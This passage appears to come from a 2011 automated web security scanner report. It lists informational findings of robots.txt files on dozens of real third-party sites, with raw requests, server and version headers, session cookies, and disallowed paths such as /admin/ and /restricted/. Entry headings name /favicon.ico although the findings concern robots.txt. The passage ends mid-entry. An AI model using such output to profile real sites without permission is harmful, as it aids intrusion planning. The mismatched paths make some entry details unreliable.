Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aquabid.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:23:36 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Mon, 24 May 2010 13:36:48 GMT
ETag: "89af60-37-4875721ee1c00"
Accept-Ranges: bytes
Content-Length: 55
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-Delay: 10
Disallow: /wanted

26.113. http://www.aquariumguys.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aquariumguys.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aquariumguys.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:20:51 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: max-age=3600, private
Expires: Tue, 03 May 2011 12:20:51 GMT
Last-Modified: Tue, 19 Apr 2011 05:04:52 GMT
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: text/plain

User-agent: *
# Cap is html
Disallow: /cgi-bin/
Disallow: /RT/
Disallow: /TG/
Disallow: /QS/
Disallow: /wgl/
Disallow: /P/
Disallow: /ymix/
Disallow: /OS/
Disallow: /cs/
Disallow: /en=
Disallow: /p/s=
...[SNIP]...

26.114. http://www.areaguides.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.areaguides.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.areaguides.net

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=lBRAJBlAzAEkAAAAMGJjZDk2N2MtNDE2MS00ZjE2LThiMmEtNmMxOTBkZGMzYTlj74gJEo9BCYAs3-5D3AIKroipLPs1; expires=Mon, 11-Jul-2011 22:23:21 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=xgxoicmbbp2v3g45zpz3s1q0; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: UserID=xgxoicmbbp2v3g45zpz3s1q0; domain=areaguides.net; expires=Thu, 03-Nov-2011 11:43:21 GMT; path=/
X-Powered-By: ASP.NET
X-Server: WEB03
p3p: CP="NOI DSP COR CURa ADMa OUR NOR"
Date: Tue, 03 May 2011 11:43:20 GMT
Connection: close
Content-Length: 808

Sitemap: http://www.areaguides.net/sitemap.xml

User-agent: *
Disallow: /ypcyellow/
Disallow: /*ypcy*?*

User-agent: Mediapartners-Google
Disallow:

User-agent: Googlebot
Disallow:
Disallow
...[SNIP]...

26.115. http://www.arteryhealthinstitute.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.arteryhealthinstitute.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.arteryhealthinstitute.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:48 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 12 Dec 2008 19:29:43 GMT
ETag: "4960124-496-45dde83d8f7c0"
Accept-Ranges: bytes
Content-Length: 1174
Connection: close
Content-Type: text/plain

User-agent: BadBot
Disallow: /
user-agent: inktomi
Disallow: /cgi-bin/
Disallow: /tmp/
Disallow: /images/
Disallow: /styles/
Disallow: /aa/
Disallow: /bb/
Disallow: /cc/
Disallow: /cart/
Disallow: /ca
...[SNIP]...

26.116. http://www.artscraftsshowbusiness.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.artscraftsshowbusiness.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.artscraftsshowbusiness.com

Response

HTTP/1.1 200 OK
Content-Length: 102
Content-Type: text/plain
Last-Modified: Tue, 14 Dec 2010 04:53:32 GMT
Accept-Ranges: bytes
ETag: "50f157db4a9bcb1:e88"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:22:25 GMT
Connection: close

User-agent: *
Allow: /
Disallow: *.axd$
Disallow: *.axd

User-agent: ia_archiver
Disallow: /

26.117. http://www.artvoice.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.artvoice.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.artvoice.com

Response

HTTP/1.0 200 OK
Server: Zope/(Zope 2.11.7-final, python 2.4.6, darwin) ZServer/1.1
Date: Tue, 03 May 2011 10:13:55 GMT
Content-Length: 425
Accept-Ranges: bytes
Last-Modified: Thu, 16 Sep 2010 20:37:34 GMT
Content-Type: text/plain; charset=utf-8
Age: 204
X-Cache: HIT from artvoice.com
Connection: close

User-agent: *
Allow: /

User-agent: TurnitinBot
Disallow: /

User-agent: twiceler
Disallow: /

User-Agent: Charlotte
Disallow: /

User-agent: ShopWiki
Disallow: /

User-agent: spbot
Disallow: /

User-
...[SNIP]...

26.118. http://www.ashmax.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ashmax.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ashmax.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:58 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b PHP/5.2.6
Last-Modified: Wed, 29 Dec 2010 22:47:37 GMT
ETag: "15e003c-42-498945b0cf440"
Accept-Ranges: bytes
Content-Length: 66
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /tmp/
Disallow: /dev/

26.119. http://www.ashop.com.au/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ashop.com.au
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ashop.com.au

Response

HTTP/1.1 200 OK
Content-Length: 65
Content-Type: text/plain
Last-Modified: Wed, 23 Mar 2011 07:32:08 GMT
Accept-Ranges: bytes
ETag: "90ef416a2ce9cb1:1618c"
Server: Microsoft-IIS/6.0
S: 1
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:36:14 GMT
Connection: close

...User-agent: *
Disallow: /admin/
Disallow: /l/
Disallow: /s/

26.120. http://www.asianage.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.asianage.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.asianage.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:38:00 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 14 May 2010 15:59:01 GMT
ETag: "15d821a-66a-f41f9b40"
Accept-Ranges: bytes
Content-Length: 1642
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 10:38:00 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.121. http://www.askdocweb.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.askdocweb.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.askdocweb.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:07:14 GMT
Server: Apache
Last-Modified: Mon, 25 Apr 2011 22:31:58 GMT
ETag: "113c3ad-11eb-4a1c5c683d380"
Accept-Ranges: bytes
Content-Length: 4587
Connection: close
Content-Type: text/plain

#
# WebmasterWorld.com: robots.txt
# Please, no more that 1 hit per minute and use off peak hours.
# http://www.searchengineworld.com/robots/

User-agent: asterias
Disallow: /

Sitemap: http://www.ask
...[SNIP]...

26.122. http://www.askdramy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.askdramy.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.askdramy.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:42:29 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 04 Feb 2011 17:43:20 GMT
ETag: "0ac3393c4cb1:2"
Content-Length: 625

# Block a bot that was causing issues by ignoring Disallow lines below
User-Agent: OmniExplorer_Bot
Disallow: /

# Block hotlinking of music files by projectplaylist.com due to perceived user band
...[SNIP]...

26.123. http://www.askthetrainer.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.askthetrainer.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.askthetrainer.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:18:43 GMT
Server: Apache
Cache-Control: max-age=604800
Last-Modified: Thu, 28 Apr 2011 16:24:58 GMT
ETag: "226e319-42c-4db994da"
Accept-Ranges: bytes
Content-Length: 1068
Connection: close
Content-Type: text/plain

User-agent: Googlebot
Disallow: /css/
Disallow: /documents-and-forms/
Disallow: /media-files/
Disallow: /matthines/
Disallow: /julianbrown/
Disallow: /david/frankovic/
Disallow: /bodybuilding/
Disallo
...[SNIP]...

26.124. http://www.astrazeneca-us.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astrazeneca-us.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.astrazeneca-us.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Unix)
Last-Modified: Thu, 03 Apr 2008 16:49:31 GMT
ETag: 1.2
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Type: text/plain
Cache-Control: no-cache
Expires: Tue, 03 May 2011 11:42:02 GMT
Date: Tue, 03 May 2011 11:42:02 GMT
Content-Length: 75
Connection: close

User-agent: *
Allow: /
Sitemap: http://www.astrazeneca-us.com/sitemap.xml

26.125. http://www.ataglance.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ataglance.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ataglance.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:18 GMT
Server: Web Server 1.0
Last-Modified: Mon, 07 Mar 2011 22:44:11 GMT
ETag: "7f76f9-1b-49dec3c09a6ae"
Accept-Ranges: bytes
Content-Length: 27
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_nxw_bubhmbodf_qspe_tubujd_mc=ffffffff09c939a745525d5f4f58455e445a4a423660;path=/

User-agent: *
Allow: /

26.126. http://www.atariage.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atariage.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.atariage.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:51:24 GMT
Server: Apache
Last-Modified: Tue, 15 Mar 2011 23:37:21 GMT
Accept-Ranges: bytes
Content-Length: 1673
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /forums/admin/
Disallow: /forums/cache/
Disallow: /forums/converge_local/
Disallow: /forums/hooks/
Disallow: /forums/ips_kernel/
Disallow: /forums/retail/
D
...[SNIP]...

26.127. http://www.atlanta.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atlanta.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.atlanta.net

Response

HTTP/1.1 200 OK
Content-Length: 2636
Content-Type: text/plain
Last-Modified: Mon, 31 Jan 2011 19:52:33 GMT
Accept-Ranges: bytes
ETag: "26bcf56680c1cb1:1517"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:50:41 GMT
Connection: close

Sitemap: http://www.atlanta.net/sitemap.xml

User-agent: *
Disallow: /test/
Disallow: /sitemap-test.html
Disallow: /sitemap-test.xml
Disallow: /ror.xml
Disallow: /site=ATLANTA.NET/
Disallow: /
...[SNIP]...

26.128. http://www.auctionadmin.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.auctionadmin.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.auctionadmin.com

Response

HTTP/1.1 200 OK
Content-Length: 25
Content-Type: text/plain
Last-Modified: Mon, 25 Apr 2011 22:58:06 GMT
Accept-Ranges: bytes
ETag: "1e87223d9c3cc1:aeb"
Server: Microsoft-IIS/6.0
X-Powered-By: APP3
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:30:30 GMT
Connection: close

User-agent: *
Disallow: /

26.129. http://www.auntbugs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.auntbugs.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.auntbugs.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:33:41 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 12 Sep 2009 03:20:39 GMT
ETag: "15080f6-45-47358eab6afc0"
Accept-Ranges: bytes
Content-Length: 69
Connection: close
Content-Type: text/plain

User-agent: *
Sitemap: http://www.auntbugs.com/sitemap.xml
Disallow:

26.130. http://www.auristechnology.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.auristechnology.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.auristechnology.com

Response

HTTP/1.1 200 OK
Content-Length: 193
Content-Type: text/plain
Last-Modified: Fri, 18 Apr 2003 19:41:34 GMT
Accept-Ranges: bytes
ETag: "f0109484e25c31:73c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:34:28 GMT
Connection: close

User-agent: *

Disallow: /flash
Disallow: /images
Disallow: /includes
Disallow: /customer_service
Disallow: /gfx
Disallow: /new_site
Disallow: /js
Disallow: /officeuse
Disallow: /test

26.131. http://www.automationdirect.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.automationdirect.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.automationdirect.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:54 GMT
Server: Apache
Set-Cookie: adcbrowserid=173.193.214.243.1304418174760831; path=/; domain=.automationdirect.com
Last-Modified: Mon, 25 Apr 2011 15:51:55 GMT
ETag: "4aa-2fd31cc0"
Accept-Ranges: bytes
Content-Length: 1194
Vary: Accept-Encoding
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" comment "ICRAonline v2.0" l r (nz 1 vz 1 lz 1 oz 1 cz 1) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /store/Login/
Disallow: /store/Register/
Disallow: /store/AccountType/
Disallow: /store/QuickOrder/
Disallow: /store/Favorites/
Disallow: /store/Cart/
Disallow: /store/C
...[SNIP]...

26.132. http://www.automobilesreview.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.automobilesreview.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.automobilesreview.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 03 May 2011 10:27:57 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Thu, 14 Apr 2011 08:51:51 GMT
ETag: "6c291d-147-4a0dd094b77c0"
Content-Length: 327
Accept-Ranges: bytes

User-Agent: *
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/themes
Allow: /

Sitemap: http://www.automobilesreview.com/sitemap/sitemap.xml.gz
Sitemap:
...[SNIP]...

26.133. http://www.autosupplyco.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autosupplyco.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.autosupplyco.com

Response

HTTP/1.1 200 OK
Content-Length: 1593
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:20:19 GMT
Connection: close

User-agent: dotbot
Disallow: /

User-agent: MJ12bot
Disallow: /

User-agent:*
Disallow: /images/
Disallow: /itemimages/
Disallow: /Iif/
Disallow: /iif/
Disallow: /Data/
Disallow: /webstor
...[SNIP]...

26.134. http://www.azandmeapp.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.azandmeapp.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.azandmeapp.com

Response

HTTP/1.1 200 OK
Content-Length: 89
Content-Type: text/plain
Last-Modified: Sat, 19 Mar 2011 19:46:02 GMT
Accept-Ranges: bytes
ETag: "8842f476ee6cb1:d13"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:22:46 GMT
Connection: close

User-agent: * # match all bots
Allow: Login.aspx
Disallow: / # keep them out, for now

26.135. http://www.azkidsnet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.azkidsnet.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.azkidsnet.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:39:25 GMT
Server: Rapidsite/Apa/1.3.33 (Unix) FrontPage/5.0.2.2510 mod_ssl/2.8.22 OpenSSL/0.9.8d
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /cgi-image/
Disallow: /cgi-local/
Disallow: /online-store/
Disallow: /stats/
Disallow: /webmail/

26.136. http://www.b92.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.b92.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.b92.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:39:30 GMT
Server: Apache/2.2.17 (Unix) DAV/2
Last-Modified: Fri, 02 Oct 2009 08:45:42 GMT
ETag: "4c179d-574-474efca025980"
Accept-Ranges: bytes
Content-Length: 1396
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /info/tajne_vesti.php
Disallow: /info/full.php
Disallow: /info/posalji_stranu.php
Disallow: /eng/send_page.php
Disallow: /*/vas_komentar.php
Disallow: /biz/vas_komentar-tv_emi
...[SNIP]...

26.137. http://www.babbittsonline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.babbittsonline.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.babbittsonline.com

Response

HTTP/1.1 200 OK
Content-Length: 230
Content-Type: text/plain
Last-Modified: Thu, 03 Feb 2011 13:55:43 GMT
Accept-Ranges: bytes
ETag: "121884caac3cb1:62d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:13:29 GMT
Connection: close

User-agent: *
Disallow: /admin/
Disallow: *.config
Disallow: *.xml
Disallow: Profile.aspx
Disallow: ErrorPage.aspx
Disallow: SiteInactive.aspx
Disallow: SiteCancelled.aspx
Disallow: /assets/50002
...[SNIP]...

26.138. http://www.babynamescountry.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.babynamescountry.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.babynamescountry.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:15 GMT
Server: Apache
Last-Modified: Thu, 22 Feb 2007 17:17:02 GMT
ETag: "1a3084c-67-d7e99f80"
Accept-Ranges: bytes
Content-Length: 103
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /_ads/
Disallow: /admin/
Disallow: /css_js/
Disallow: /images/
Disallow: /libs/

26.139. http://www.babynamespedia.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.babynamespedia.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.babynamespedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:32 GMT
Server: Apache
Last-Modified: Fri, 03 Sep 2010 09:11:33 GMT
ETag: "b3c356-129-48f575122bb40"
Accept-Ranges: bytes
Content-Length: 297
Content-Type: text/plain; charset=ISO-8859-1
Connection: close

User-agent: Slurp
Disallow: /*?*
Disallow: /random
Disallow: /shortlist
Disallow: /general

User-agent: Googlebot
Disallow: /*?*
Disallow: /random
Disallow: /shortlist
Disallow: /general

User-agent:
...[SNIP]...

26.140. http://www.backgroundlabs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.backgroundlabs.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.backgroundlabs.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:53:14 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4
Last-Modified: Tue, 22 Feb 2011 22:45:20 GMT
ETag: "1ae818c-2d-49ce6bc282000"
Accept-Ranges: bytes
Content-Length: 45
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /
Disallow: /cgi-bin/

26.141. http://www.bagsnob.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bagsnob.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bagsnob.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:24:27 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9
Last-Modified: Sat, 30 Apr 2011 19:13:29 GMT
Accept-Ranges: bytes
Content-Length: 157
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow: /fastsearch

User-agent: *
Disallow: /cgi-bin/
Disallow: /cgi-bin/mt/
Disallow: /fastsearch
Disallow: /archives/

26.142. http://www.bagsunlimited.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bagsunlimited.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bagsunlimited.com

Response

HTTP/1.1 200 OK
Content-Length: 2590
Content-Type: text/plain
Last-Modified: Tue, 05 Apr 2011 19:01:43 GMT
Accept-Ranges: bytes
ETag: "fee441e7c3f3cb1:be7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:22:54 GMT
Connection: close

User-agent: *
Disallow: /ASPDNSFCommon/
Disallow: /ASPDNSFEncrypt/
Disallow: /ASPDNSFGateways/
Disallow: /ASPDNSFPatterns/
Disallow: /ASPDNSFQuickBooks/
Disallow: /bin/
Disallow: /categorydescr
...[SNIP]...

26.143. http://www.bakersfieldcollege.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bakersfieldcollege.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bakersfieldcollege.edu

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:30:53 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Thu, 18 May 2006 23:02:57 GMT
ETag: "c0b1f233cf7ac61:9e7"
Content-Length: 67

User-agent: *
Disallow: /css/
Disallow: /images/
Dissalow: /irp/

26.144. http://www.bankruptcyinformation.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bankruptcyinformation.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bankruptcyinformation.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:00 GMT
Server: Apache/2.2.17
Last-Modified: Tue, 26 Oct 2010 23:26:18 GMT
ETag: "18-4938d6f8c9a80"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *Disallow:

26.145. http://www.bankserv.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bankserv.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bankserv.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:20 GMT
Server: Apache
Last-Modified: Thu, 10 Feb 2011 16:40:12 GMT
ETag: "638c3-12a-3c3e1300"
Accept-Ranges: bytes
Content-Length: 298
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /webmail/
Disallow: /products/p2p_products.html
Disallow: /multimedia/
Disallow: /restricted/
Disallow: /restricted2/
Disallow: /restricted3/
Disallow: /demo/

User-agent: psbo
...[SNIP]...

26.146. http://www.barnettharley.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.barnettharley.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.barnettharley.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 10:50:14 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "130-49680daf-0"
Last-Modified: Sat, 10 Jan 2009 02:53:35 GMT
Content-Type: text/plain
Content-Length: 304
Vary: User-Agent

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

26.147. http://www.baylinerownersclub.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.baylinerownersclub.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.baylinerownersclub.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:40:21 GMT
Server: Apache
Last-Modified: Sun, 20 Mar 2011 18:02:30 GMT
ETag: "9847ee0c-25-49eedd08e9d19"
Accept-Ranges: bytes
Content-Length: 37
Connection: close
Content-Type: text/plain

# go away
User-agent: *
Disallow: /

26.148. http://www.bbing.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bbing.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bbing.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:38:00 GMT
Server: Apache/2
Last-Modified: Thu, 28 Oct 2010 18:16:32 GMT
ETag: "1810e3-6a-493b1576b8000"
Accept-Ranges: bytes
Content-Length: 106
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# Disallow Web Bots
User-agent: *
Disallow: /

# Disallow Archive Bots
User-agent: ia_archiver
Disallow: /

26.149. http://www.bbspot.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bbspot.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bbspot.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:17:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.4
Last-Modified: Wed, 28 Apr 2004 12:05:06 GMT
ETag: "1ec813e-20-3d91f6bcde080"
Accept-Ranges: bytes
Content-Length: 32
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /forum2/

26.150. http://www.bcbsga.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bcbsga.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bcbsga.com

Response

